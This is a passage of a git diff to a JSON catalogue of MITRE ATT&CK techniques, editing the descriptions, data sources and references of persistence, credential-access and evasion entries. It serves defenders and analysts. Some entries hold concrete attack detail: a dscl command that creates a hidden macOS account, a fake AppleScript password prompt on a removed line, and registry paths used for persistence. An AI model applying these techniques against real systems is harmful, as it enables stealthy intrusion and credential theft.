"https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a", + "https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/", + "https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html", + "https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence" + ] + }, + "uuid": "0fff2797-19cb-41ea-a5f1-8a9303b8158e", + "value": "Systemd Service - T1501" + }, { "description": "Adversaries may add malicious content to an internally accessible website through an open network file share that contains the website's webroot or Web content directory (Citation: Microsoft Web Root OCT 2016) (Citation: Apache Server 2018) and then browse to that content with a Web browser to cause the server to execute the malicious content. The malicious content will typically run under the context and permissions of the Web server process, often resulting in local system or administrative privileges, depending on how the Web server is configured.\n\nThis mechanism of shared access and remote execution could be used for lateral movement to the system running the Web server. For example, a Web server running PHP with an open network share could allow an adversary to upload a remote access tool and PHP script to execute the RAT on the system running the Web server when a specific page is visited. (Citation: Webroot PHP 2011)", "meta": { @@ -8330,6 +8789,36 @@ "uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", "value": "Data Staged - T1074" }, + { + "description": "Execution guardrails constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. \n\nGuardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.\n\nEnvironmental keying is one type of guardrail that includes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents) Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).\n\nSimilar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use guardrails and environmental keying to help protect their TTPs and evade detection. For example, environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) In general, guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) where a decision can be made not to further engage because the value conditions specified by the adversary are meant to be target specific and not such that they could occur in any environment.", + "meta": { + "external_id": "T1480", + "kill_chain": [ + "mitre-attack:defense-evasion" + ], + "mitre_data_sources": [ + "Process monitoring" + ], + "mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1480", + "https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/", + "https://www.schneier.com/academic/paperfiles/paper-clueless-agents.pdf", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134940/kaspersky-lab-gauss.pdf", + "https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices", + "https://pdfs.semanticscholar.org/2721/3d206bc3c1e8c229fb4820b6af09e7f975da.pdf", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/smuggling-hta-files-in-internet-exploreredge/", + "https://github.com/Genetic-Malware/Ebowla/blob/master/Eko_2016_Morrow_Pitts_Master.pdf", + "https://github.com/nccgroup/demiguise/blob/master/examples/virginkey.js" + ] + }, + "uuid": "853c4192-4311-43e1-bfbb-b11b14911852", + "value": "Execution Guardrails - T1480" + }, { "description": "Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.\n\n### Windows\n\nThere are multiple approaches to injecting code into a live process. Windows implementations include: (Citation: Endgame Process Injection July 2017)\n\n* **Dynamic-link library (DLL) injection** involves writing the path to a malicious DLL inside a process then invoking execution by creating a remote thread.\n* **Portable executable injection** involves writing malicious code directly into the process (without a file on disk) then invoking execution with either additional code or by creating a remote thread. The displacement of the injected code introduces the additional requirement for functionality to remap memory references. Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue. (Citation: Endgame HuntingNMemory June 2017)\n* **Thread execution hijacking** involves injecting malicious code or the path to a DLL into a thread of a process. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1093), the thread must first be suspended.\n* **Asynchronous Procedure Call** (APC) injection involves attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state. A variation of APC injection, dubbed \"Early Bird injection\", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table. (Citation: Microsoft Atom Table)\n* **Thread Local Storage** (TLS) callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. (Citation: FireEye TLS Nov 2017)\n\n### Mac and Linux\n\nImplementations for Linux and OS X/macOS systems include: (Citation: Datawire Code Injection) (Citation: Uninformed Needle)\n\n* **LD_PRELOAD, LD_LIBRARY_PATH** (Linux), **DYLD_INSERT_LIBRARIES** (Mac OS X) environment variables, or the dlfcn application programming interface (API) can be used to dynamically load a library (shared object) in a process which can be used to intercept API calls from the running process. (Citation: Phrack halfdead 1997)\n* **Ptrace system calls** can be used to attach to a running process and modify it in runtime. (Citation: Uninformed Needle)\n* **/proc/[pid]/mem** provides access to the memory of the process and can be used to read/write arbitrary data to it. This technique is very rare due to its complexity. (Citation: Uninformed Needle)\n* **VDSO hijacking** performs runtime injection on ELF binaries by manipulating code stubs mapped in from the linux-vdso.so shared object. (Citation: VDSO hijack 2009)\n\nMalware commonly utilizes process injection to access system resources through which Persistence and other environment modifications can be made. More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.", "meta": { @@ -8455,7 +8944,7 @@ "value": "Account Discovery - T1087" }, { - "description": "Adversaries may steal the credentials of a specific user or service account using Credential Access techniques or capture credentials earlier in their reconnaissance process through social engineering for means of gaining Initial Access. \n\nCompromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.\n\nAdversaries may also create accounts, sometimes using pre-defined account names and passwords, as a means for persistence through backup access in case other means are unsuccessful. \n\nThe overlap of credentials and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)", + "description": "Adversaries may steal the credentials of a specific user or service account using Credential Access techniques or capture credentials earlier in their reconnaissance process through social engineering for means of gaining Initial Access. \n\nAccounts that an adversary may use can fall into three categories: default, local, and domain accounts. Default accounts are those that are built-into an OS such as Guest or Administrator account on Windows systems or default factory/provider set accounts on other types of systems, software, or devices. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. (Citation: Microsoft Local Accounts Feb 2019) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.\n\nCompromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.\n\nDefault accounts are also not limited to Guest and Administrator on client machines, they also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or COTS. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed private keys, or stolen private keys, to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021) (Citation: Metasploit SSH Module)\n\nThe overlap of account access, credentials, and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)", "meta": { "external_id": "CAPEC-560", "kill_chain": [ @@ -8476,6 +8965,8 @@ "refs": [ "https://attack.mitre.org/techniques/T1078", "https://capec.mitre.org/data/definitions/560.html", + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts", + "https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh", "https://technet.microsoft.com/en-us/library/dn535501.aspx", "https://technet.microsoft.com/en-us/library/dn487457.aspx" ] @@ -8540,7 +9031,7 @@ "value": "Account Manipulation - T1098" }, { - "description": "Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in Persistence and Execution.\n\nAccess to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API (see examples).\n\nRegistry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reg)hide NOV 2006 Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to establish Persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)\n\nThe Registry of a remote system may be modified to aid in execution of files as part of Lateral Movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) for RPC communication.", + "description": "Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in Persistence and Execution.\n\nAccess to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API (see examples).\n\nRegistry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to establish Persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)\n\nThe Registry of a remote system may be modified to aid in execution of files as part of Lateral Movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) for RPC communication.", "meta": { "external_id": "T1112", "kill_chain": [ @@ -8560,11 +9051,11 @@ "https://attack.mitre.org/techniques/T1112", "https://technet.microsoft.com/en-us/library/cc732643.aspx", "https://docs.microsoft.com/sysinternals/downloads/reghide", - "https://docs.microsoft.com/en-us/sysinternals/downloads/regdelnull", - "https://technet.microsoft.com/en-us/library/cc754820.aspx", + "https://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/", "https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353", + "https://technet.microsoft.com/en-us/library/cc754820.aspx", "https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4657", - "https://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/" + "https://docs.microsoft.com/en-us/sysinternals/downloads/regdelnull" ] }, "uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", @@ -8667,23 +9158,28 @@ "value": "Email Collection - T1114" }, { - "description": "When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task. Adversaries can mimic this functionality to prompt users for credentials with a normal-looking prompt. This type of prompt can be accomplished with AppleScript:\n\nset thePassword to the text returned of (display dialog \"AdobeUpdater needs permission to check for updates. Please authenticate.\" default answer \"\")\n (Citation: OSX Keydnap malware)\n\nAdversaries can prompt a user for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite. (Citation: OSX Malware Exploits MacKeeper)", + "description": "When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1088)).\n\nAdversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1155)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware) and [PowerShell](https://attack.mitre.org/techniques/T1086)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015).", "meta": { "external_id": "T1141", "kill_chain": [ "mitre-attack:credential-access" ], "mitre_data_sources": [ + "Process monitoring", + "Process command-line parameters", "User interface", - "Process monitoring" + "PowerShell logs" ], "mitre_platforms": [ - "macOS" + "macOS", + "Windows" ], "refs": [ "https://attack.mitre.org/techniques/T1141", + "https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html", + "https://logrhythm.com/blog/do-you-trust-your-computer/", "https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/", - "https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html" + "https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/" ] }, "uuid": "91ce1ede-107f-4d8b-bf4c-735e8789c94b", @@ -8788,7 +9284,7 @@ "value": "Automated Collection - T1119" }, { - "description": "Microsoft’s Open Office XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered. (Citation: Microsoft Open XML July 2017)\n\nProperties within parts may reference shared public resources accessed via online URLs. For example, template properties reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.\n\nAdversaries may abuse this technology to initially conceal malicious code to be executed via documents (i.e. [Scripting](https://attack.mitre.org/techniques/T1064)). Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. These documents can be delivered via other techniques such as [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched. (Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit. (Citation: MalwareBytes Template Injection OCT 2017)\n\nThis technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt. (Citation: Anomali Template Injection MAR 2018) (Citation: Talos Template Injection July 2017) (Citation: ryhanson phishery SEPT 2016)", + "description": "Microsoft’s Open Office XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered. (Citation: Microsoft Open XML July 2017)\n\nProperties within parts may reference shared public resources accessed via online URLs. For example, template properties reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.\n\nAdversaries may abuse this technology to initially conceal malicious code to be executed via documents (i.e. [Scripting](https://attack.mitre.org/techniques/T1064)). Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. (Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched. (Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit. (Citation: MalwareBytes Template Injection OCT 2017)\n\nThis technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt. (Citation: Anomali Template Injection MAR 2018) (Citation: Talos Template Injection July 2017) (Citation: ryhanson phishery SEPT 2016)", "meta": { "external_id": "T1221", "kill_chain": [ @@ -8806,11 +9302,12 @@ "refs": [ "https://attack.mitre.org/techniques/T1221", "https://docs.microsoft.com/previous-versions/office/developer/office-2007/aa338205(v=office.12)", - "https://forum.anomali.com/t/credential-harvesting-and-malicious-file-delivery-using-microsoft-office-template-injection/2104", + "https://www.sans.org/reading-room/whitepapers/testing/template-injection-attacks-bypassing-security-controls-living-land-38780", + "http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html", "https://blog.malwarebytes.com/threat-analysis/2017/10/decoy-microsoft-word-document-delivers-malware-through-rat/", + "https://forum.anomali.com/t/credential-harvesting-and-malicious-file-delivery-using-microsoft-office-template-injection/2104", "https://blog.talosintelligence.com/2017/07/template-injection.html", - "https://github.com/ryhanson/phishery", - "http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html" + "https://github.com/ryhanson/phishery" ] }, "uuid": "dc31fe1e-d722-49da-8f5f-92c7b5aff534", @@ -8942,7 +9439,7 @@ "value": "Domain Fronting - T1172" }, { - "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager are loaded into every process that calls the ubiquitously used application programming interface (API) functions: (Citation: Endgame Process Injection July 2017)\n\n* CreateProcess\n* CreateProcessAsUser\n* CreateProcessWithLoginW\n* CreateProcessWithTokenW\n* WinExec\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.", + "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager are loaded into every process that calls the ubiquitously used application programming interface (API) functions CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, or WinExec. (Citation: Endgame Process Injection July 2017)\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.", "meta": { "external_id": "T1182", "kill_chain": [ @@ -8959,9 +9456,9 @@ ], "refs": [ "https://attack.mitre.org/techniques/T1182", + "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", "https://technet.microsoft.com/en-us/sysinternals/bb963902", - "https://forum.sysinternals.com/appcertdlls_topic12546.html", - "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + "https://forum.sysinternals.com/appcertdlls_topic12546.html" ] }, "uuid": "4bf5845d-a814-4490-bc5c-ccdee6043025", @@ -9067,7 +9564,7 @@ "value": "Create Account - T1136" }, { - "description": "The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Endgame Process Injection July 2017) Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses [Hooking](https://attack.mitre.org/techniques/T1179) to redirect the code as necessary in order to communicate with the OS. A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:\n\n* %WINDIR%\\AppPatch\\sysmain.sdb\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb\n\nCustom databases are stored in:\n\n* %WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) (UAC) (RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress). Similar to [Hooking](https://attack.mitre.org/techniques/T1179), utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc.", + "description": "The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Endgame Process Injection July 2017) Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses [Hooking](https://attack.mitre.org/techniques/T1179) to redirect the code as necessary in order to communicate with the OS. \n\nA list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:\n\n* %WINDIR%\\AppPatch\\sysmain.sdb\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb\n\nCustom databases are stored in:\n\n* %WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) (UAC) (RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress). Similar to [Hooking](https://attack.mitre.org/techniques/T1179), utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc.", "meta": { "external_id": "T1138", "kill_chain": [ @@ -9086,8 +9583,8 @@ ], "refs": [ "https://attack.mitre.org/techniques/T1138", - "https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf", - "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", + "https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf" ] }, "uuid": "7c93aa74-4bc0-4a9e-90ea-f25f86301566", @@ -9206,7 +9703,7 @@ "value": "Private Keys - T1145" }, { - "description": "An adversary with physical access to a mobile device may seek to bypass the device's lockscreen.\n\n### Biometric Spoofing\nIf biometric authentication is used, an adversary could attempt to spoof a mobile device's biometric authentication mechanism. For example, SRLabs (Citation: SRLabs-Fingerprint) describes providing a fake fingerprint, and SecureIDNews describes similar work by Michigan State University (Citation: SecureIDNews-Spoof). The Sun describes a case where someone else's face was able to unlock an iPhone X with Face ID (Citation: TheSun-FaceID).\n\niOS partly mitigates this attack by requiring the device passcode rather than a fingerprint to unlock the device after every device restart and after 48 hours since the device was last unlocked (Citation: Apple-TouchID). Android has similar mitigations.\n\n### Device Unlock Code Guessing or Brute Force\nAn adversary could attempt to brute-force or otherwise guess the lockscreen passcode (typically a PIN or password), including physically observing (\"shoulder surfing\") the device owner's use of the lockscreen passcode. \n\n### Exploit Other Device Lockscreen Vulnerabilities\nTechniques have periodically been demonstrated that exploit vulnerabilities on Android (Citation: Wired-AndroidBypass), iOS (Citation: Kaspersky-iOSBypass), or other mobile devices to bypass the device lockscreen. The vulnerabilities are generally patched by the device/operating system vendor once they become aware of their existence.", + "description": "An adversary with physical access to a mobile device may seek to bypass the device's lockscreen.\n\n### Biometric Spoofing\nIf biometric authentication is used, an adversary could attempt to spoof a mobile device's biometric authentication mechanism(Citation: SRLabs-Fingerprint)(Citation: SecureIDNews-Spoof)(Citation: TheSun-FaceID).\n\niOS partly mitigates this attack by requiring the device passcode rather than a fingerprint to unlock the device after every device restart and after 48 hours since the device was last unlocked (Citation: Apple-TouchID). Android has similar mitigations.\n\n### Device Unlock Code Guessing or Brute Force\nAn adversary could attempt to brute-force or otherwise guess the lockscreen passcode (typically a PIN or password), including physically observing (\"shoulder surfing\") the device owner's use of the lockscreen passcode. \n\n### Exploit Other Device Lockscreen Vulnerabilities\nTechniques have periodically been demonstrated that exploit vulnerabilities on Android (Citation: Wired-AndroidBypass), iOS (Citation: Kaspersky-iOSBypass), or other mobile devices to bypass the device lockscreen. The vulnerabilities are generally patched by the device/operating system vendor once they become aware of their existence.", "meta": { "external_id": "T1461", "kill_chain": [ @@ -9218,17 +9715,35 @@ ], "refs": [ "https://attack.mitre.org/techniques/T1461", - "https://www.wired.com/2015/09/hack-brief-new-emergency-number-hack-easily-bypasses-android-lock-screens/", - "https://threatpost.com/ios-10-passcode-bypass-can-access-photos-contacts/122033/", "https://srlabs.de/bites/spoofing-fingerprints/", - "https://support.apple.com/en-us/HT204587", "https://thehackernews.com/2016/05/android-kernal-exploit.htmlhttps://www.secureidnews.com/news-item/another-spoof-of-mobile-biometrics/", - "https://www.thesun.co.uk/tech/5584082/iphone-x-face-unlock-tricked-broken/" + "https://www.thesun.co.uk/tech/5584082/iphone-x-face-unlock-tricked-broken/", + "https://support.apple.com/en-us/HT204587", + "https://www.wired.com/2015/09/hack-brief-new-emergency-number-hack-easily-bypasses-android-lock-screens/", + "https://threatpost.com/ios-10-passcode-bypass-can-access-photos-contacts/122033/" ] }, "uuid": "dfe29258-ce59-421c-9dee-e85cb9fa90cd", "value": "Lockscreen Bypass - T1461" }, + { + "description": "An adversary may encrypt files stored on the mobile device to prevent the user from accessing them, for example with the intent of only unlocking access to the files after a ransom is paid. Without escalated privileges, the adversary is generally limited to only encrypting files in external/shared storage locations. This technique has been demonstrated on Android. We are unaware of any demonstrated use on iOS.", + "meta": { + "external_id": "APP-28", + "kill_chain": [ + "mitre-mobile-attack:effects" + ], + "mitre_platforms": [ + "Android" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1471", + "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-28.html" + ] + }, + "uuid": "d9e88203-2b5d-405f-a406-2933b1e3d7e4", + "value": "Encrypt Files - T1471" + }, { "description": "Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in /Library/Preferences/com.apple.loginwindow called Hide500Users that prevents users with userIDs 500 and lower from appearing at the login screen. By using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 and enabling this property (setting it to Yes), an adversary can hide their user accounts much more easily: sudo dscl . -create /Users/username UniqueID 401 (Citation: Cybereason OSX Pirrit).", "meta": { @@ -9297,6 +9812,24 @@ "uuid": "c1b11bf7-c68e-4fbf-a95b-28efbe7953bb", "value": "SSH Hijacking - T1184" }, + { + "description": "Adversaries may use an existing, legitimate external Web service as a means for relaying commands to a compromised system.\n\nThese commands may also include pointers to command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.\n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).", + "meta": { + "external_id": "T1481", + "kill_chain": [ + "mitre-mobile-attack:command-and-control" + ], + "mitre_platforms": [ + "Android", + "iOS" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1481" + ] + }, + "uuid": "c6a146ae-9c63-4606-97ff-e261e76e8380", + "value": "Web Service - T1481" + }, { "description": "As of OS X 10.8, mach-O binaries introduced a new header called LC_MAIN that points to the binary’s entry point for execution. Previously, there were two headers to achieve this same effect: LC_THREAD and LC_UNIXTHREAD (Citation: Prolific OSX Malware History). The entry point for a binary can be hijacked so that initial execution flows to a malicious addition (either another section or a code cave) and then goes back to the initial entry point so that the victim doesn’t know anything was different (Citation: Methods of Mac Malware Persistence). By modifying a binary in this way, application whitelisting can be bypassed because the file name or application path is still the same.", "meta": { @@ -9710,7 +10243,7 @@ "value": 